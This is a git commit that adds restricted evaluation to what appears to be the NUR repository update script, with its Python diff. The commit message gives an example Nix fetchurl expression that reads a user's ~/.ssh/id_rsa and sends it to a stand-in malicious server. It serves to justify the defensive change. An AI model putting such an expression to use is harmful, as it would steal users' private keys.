restrict evaluation of repos

It should be save for users to evaluate nix code.
Therefore we restrict evaluation of repositories.
Otherwise an attacker could leak confidential data, i.e.:

fetchurl {
  url = "https://malicious-server.com/log-key?content=" + (builtins.readFile "../../.ssh/id_rsa");
  sha256 = "43c2c9e5e7a16b6c88ba3088a9bfc82f7db8e13378be7c78d6c14a5f8ed05afd";
}
This commit is contained in:
Jörg Thalheim 2018-07-01 15:50:39 +01:00
parent 3f515f8bab
commit a50860fcbb

View file

@ -5,6 +5,7 @@ import json
import shutil
import re
import sys
import os
from pathlib import Path
from typing import List, Optional, Tuple
import xml.etree.ElementTree as ET
@ -51,13 +52,13 @@ class GithubRepo():
f"Repository {self.owner}/{self.name} not found")
raise
def prefetch(self, ref: str, nix_file: str) -> Tuple[str, Path]:
def prefetch(self, ref: str) -> Tuple[str, Path]:
data = subprocess.check_output([
"nix-prefetch-url", "--unpack", "--print-path",
self.url(f"archive/{ref}.tar.gz")
])
sha256, path = data.decode().strip().split("\n")
return sha256, Path(path).joinpath(nix_file)
return sha256, Path(path)
class RepoType(Enum):
@ -82,26 +83,25 @@ class Repo():
self.type = RepoType.from_url(url)
def prefetch_git(url: str, nix_file: str) -> Tuple[str, str, Path]:
with tempfile.TemporaryDirectory() as tempdir:
try:
result = subprocess.run(
["nix-prefetch-git", url],
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
raise NurError(f"Failed to prefetch git repository {url}")
def prefetch_git(url: str) -> Tuple[str, str, Path]:
try:
result = subprocess.run(
["nix-prefetch-git", url],
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
raise NurError(f"Failed to prefetch git repository {url}")
metadata = json.loads(result.stdout)
lines = result.stderr.decode("utf-8").split("\n")
repo_path = re.search("path is (.+)", lines[-5])
assert repo_path is not None
path = Path(repo_path.group(1)).joinpath(nix_file)
return metadata["rev"], metadata["sha256"], path
metadata = json.loads(result.stdout)
lines = result.stderr.decode("utf-8").split("\n")
repo_path = re.search("path is (.+)", lines[-5])
assert repo_path is not None
path = Path(repo_path.group(1))
return metadata["rev"], metadata["sha256"], path
def prefetch(name: str, url: ParseResult, nix_file: str,
def prefetch(name: str, url: ParseResult,
locked_repo: Optional[Repo]) -> Tuple[Repo, Optional[Path]]:
repo_type = RepoType.from_url(url)
@ -112,31 +112,54 @@ def prefetch(name: str, url: ParseResult, nix_file: str,
if locked_repo is not None:
if locked_repo.rev == commit:
return locked_repo, None
sha256, path = gh_repo.prefetch(commit, nix_file)
sha256, path = gh_repo.prefetch(commit)
else:
commit, sha256, path = prefetch_git(url.geturl(), nix_file)
commit, sha256, path = prefetch_git(url.geturl())
return Repo(name, url, commit, sha256), path
def update(name: str, url: ParseResult, nix_file: str,
locked_repo: Optional[Repo]) -> Repo:
repo, path = prefetch(name, url, nix_file, locked_repo)
if path:
with tempfile.NamedTemporaryFile(mode="w") as f:
def nixpkgs_path() -> str:
cmd = ["nix", "eval", "(<nixpkgs>)"]
return subprocess.check_output(cmd).decode("utf-8").strip()
def eval_repo(name: str, repo_path: Path, nix_file: str) -> None:
with tempfile.TemporaryDirectory() as d:
eval_path = Path(d).joinpath("default.nix")
with open(eval_path, "w") as f:
f.write(f"""
with import <nixpkgs> {{}};
callPackages {path} {{}}
callPackages {repo_path.joinpath(nix_file)} {{}}
""")
f.flush()
res = subprocess.call(
[
"nix-env", "-f", f.name, "-qa", "*", "--meta", "--xml",
"--drv-path", "--show-trace"
],
stdout=subprocess.PIPE)
nix_path = [
f"nixpkgs={nixpkgs_path()}",
str(repo_path),
str(eval_path),
]
env = dict(
NIX_PATH=":".join(nix_path),
PATH=os.environ["PATH"],
)
cmd = [
"nix-env", "-f",
str(eval_path), "-qa", "*", "--meta", "--xml", "--option",
"restrict-eval", "true", "--drv-path", "--show-trace"
]
proc = subprocess.Popen(cmd, env=env, stdout=subprocess.PIPE)
res = proc.wait()
if res != 0:
raise NurError(f"{name} does not evaluate")
raise NurError(f"{name} does not evaluate:\n$ {' '.join(cmd)}")
def update(name: str, url: ParseResult, nix_file: str,
locked_repo: Optional[Repo]) -> Repo:
repo, repo_path = prefetch(name, url, locked_repo)
if repo_path:
eval_repo(name, repo_path, nix_file)
return repo
@ -148,7 +171,8 @@ def update_lock_file(repos: List[Repo]):
tmp_file = str(LOCK_PATH) + "-new"
with open(tmp_file, "w") as lock_file:
json.dump(dict(repos=locked_repos), lock_file, indent=4, sort_keys=True)
json.dump(
dict(repos=locked_repos), lock_file, indent=4, sort_keys=True)
shutil.move(tmp_file, LOCK_PATH)